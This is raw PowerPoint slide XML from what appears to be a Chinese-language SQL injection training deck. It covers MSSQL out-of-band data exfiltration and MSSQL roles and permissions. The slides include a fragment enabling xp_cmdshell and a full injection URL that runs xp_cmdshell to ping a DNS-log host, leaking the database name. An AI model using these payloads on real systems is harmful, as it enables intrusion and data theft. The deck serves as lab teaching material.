              </a:rPr>
              <a:t>', 1;RECONFIGURE;-- </a:t>
            </a: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开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>，默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>以后默认关闭</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{099AAFDE-63C4-4392-A1C1-FB1A188A1DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3173115"/>
            <a:ext cx="12192000" cy="3420223"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268864386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400" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据外带实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020849"/>
            <a:ext cx="11232815" cy="293926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spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="477588" indent="-304792" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>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注入测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>172.16.12.50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>申请域名</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECD00B18-6CD5-43A0-8D2E-23EEE8578755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="364592" y="2413917"/>
            <a:ext cx="11417331" cy="4140507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23669802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400" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据外带实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020849"/>
            <a:ext cx="11232815" cy="24929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spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="477588" indent="-304792" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>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注入测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=3;declare @a varchar(1024);set @a=(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>());exec('master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> "ping '%2b@a%2b'.akx7l0.log.saltor.icu"')--</a:t>
            </a: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用户名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>22</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2832E496-FCB4-4FB9-AD7C-19B3FF8CFC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2315990" y="3429000"/>
            <a:ext cx="7261340" cy="2730656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1764634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43840" y="335251"/>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sz="2400" dirty="0" err="1"/>
              <a:t>MSSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>权限控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414021" y="836507"/>
            <a:ext cx="11022753" cy="45024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marL="380990" indent="-380990" defTabSz="609585" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>MSSql中角色和用户之间的关系：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775547" y="2234688"/>
            <a:ext cx="2307167" cy="369326"/>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ctr" forceAA="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>服务器登录名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776394" y="3657934"/>
            <a:ext cx="2307167" cy="369326"/>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ctr" forceAA="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>服务器角色</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4259581" y="2234688"/>
            <a:ext cx="2307167" cy="369326"/>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ctr" forceAA="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>数据库用户名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7813887" y="2234688"/>
            <a:ext cx="2307167" cy="369326"/>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ctr" forceAA="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>架构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7813887" y="896108"/>
            <a:ext cx="2307167" cy="369326"/>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ctr" forceAA="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4259581" y="3657934"/>
            <a:ext cx="2307167" cy="369326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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ctr" forceAA="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>数据库角色</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="直接连接符 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1929131" y="2604014"/>
            <a:ext cx="847" cy="1053920"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接连接符 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3082714" y="2419351"/>
            <a:ext cx="1176867" cy="0"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直接连接符 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5413165" y="2604014"/>
            <a:ext cx="0" cy="1053920"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接连接符 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6566748" y="2419351"/>
            <a:ext cx="1247139" cy="0"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="直接连接符 16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8967471" y="1265434"/>
            <a:ext cx="0" cy="969254"/>
          </a:xfrm>
          <a:prstGeom prst="line">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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="肘形连接符 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="3"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6566748" y="2604014"/>
            <a:ext cx="2400723" cy="1238583"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400"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cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593514" y="2808393"/>
            <a:ext cx="1789853" cy="36932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defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>权限针对实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3329094" y="1951567"/>
            <a:ext cx="684953" cy="36932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algn="ctr" defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>1-1.*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847841" y="1774614"/>
            <a:ext cx="684953" cy="36932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algn="ctr" defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>1-1.*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3843020" y="2809241"/>
            <a:ext cx="1569720" cy="36932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defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>权限针对数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7621694" y="3477261"/>
            <a:ext cx="684953" cy="369326"/>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algn="ctr" defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>1-1.*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414020" y="4610947"/>
            <a:ext cx="8393853" cy="15568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t" forceAA="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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1、一个数据库用户可以对应多个架构（架构是表容器）。架构里面包含的是数据库表。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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2、一个数据库角色有可能涉及多个架构。数据库角色对应的是权限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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3、一个用户对应一个数据库角色。</a:t>
            </a:r>
          </a:p>
          <a:p>
